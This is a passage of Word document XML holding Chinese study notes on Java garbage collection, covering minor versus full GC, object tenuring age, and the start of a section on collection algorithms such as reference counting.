    </w:p>
    <w:p w:rsidR="006C6BBD" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="006C6BBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidR="00B102FC" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://itindex.net/detail/18325-jvm-%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6-gc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B74252" w:rsidRDefault="00B74252" w:rsidP="00B74252">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="005D2FC5">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="005D2FC5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  minor gc </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> full gc </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虚拟机给每个对象定义了一个对象年龄（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Age</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）计数器。如果对象在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eden </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>出生并经过第一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后仍然存活，并且能被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Survivor </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>容纳的话，将被移动到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Survivor </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>空间中，并将对象年龄设为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。对象在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Survivor </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>区中每熬过一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，年龄就增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>岁，当它的年龄增加到一定程度（默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>岁）时，就会被晋升到老年代中。对象晋升老年代的年龄阈值，可以通过参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -XX:MaxTenuringThreshold </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>(1) minor gc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>从年轻代空间（包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eden </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Survivor </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>区域）回收内存被称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Minor GC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的情况就相当清楚了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>每次</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>会清理年轻代的内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> JVM </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>无法为一个新的对象分配空间时会触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，比如当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eden </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>区满了。所以分配率越高，越频繁执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Minor GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRPr="00F41A4C" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2) full gc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0681" w:rsidRDefault="004D0681" w:rsidP="004D0681">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Full GC </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>是清理堆空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>包括年轻代和永久代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B102FC" w:rsidRPr="004D0681" w:rsidRDefault="00B102FC" w:rsidP="006C6BBD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C6BBD" w:rsidRPr="00F41A4C" w:rsidRDefault="006C6BBD" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EE54B7" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE54B7" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C62B6" w:rsidRPr="00F41A4C" w:rsidRDefault="00582C16" w:rsidP="006C62B6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F1551C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C62B6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A7283D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidR="00A7283D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>垃圾回收</w:t>
      </w:r>
      <w:r w:rsidR="00D617D7" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C62B6" w:rsidRPr="00F41A4C" w:rsidRDefault="00DF3BAA" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>循环引用问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C62B6" w:rsidRPr="00F41A4C" w:rsidRDefault="006C62B6" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B7400" w:rsidRPr="00F41A4C" w:rsidRDefault="00DF3BAA" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F55D8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="006F55D8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引用计数（</w:t>
      </w:r>
      <w:r w:rsidR="006F55D8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reference Counting</w:t>
      </w:r>
      <w:r w:rsidR="006F55D8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="006F55D8" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A0329D" w:rsidRPr="00F41A4C" w:rsidRDefault="00A0329D" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无法处理循环引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="006F55D8" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F55D8" w:rsidRPr="00F41A4C" w:rsidRDefault="006F55D8" w:rsidP="00DF3BAA">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
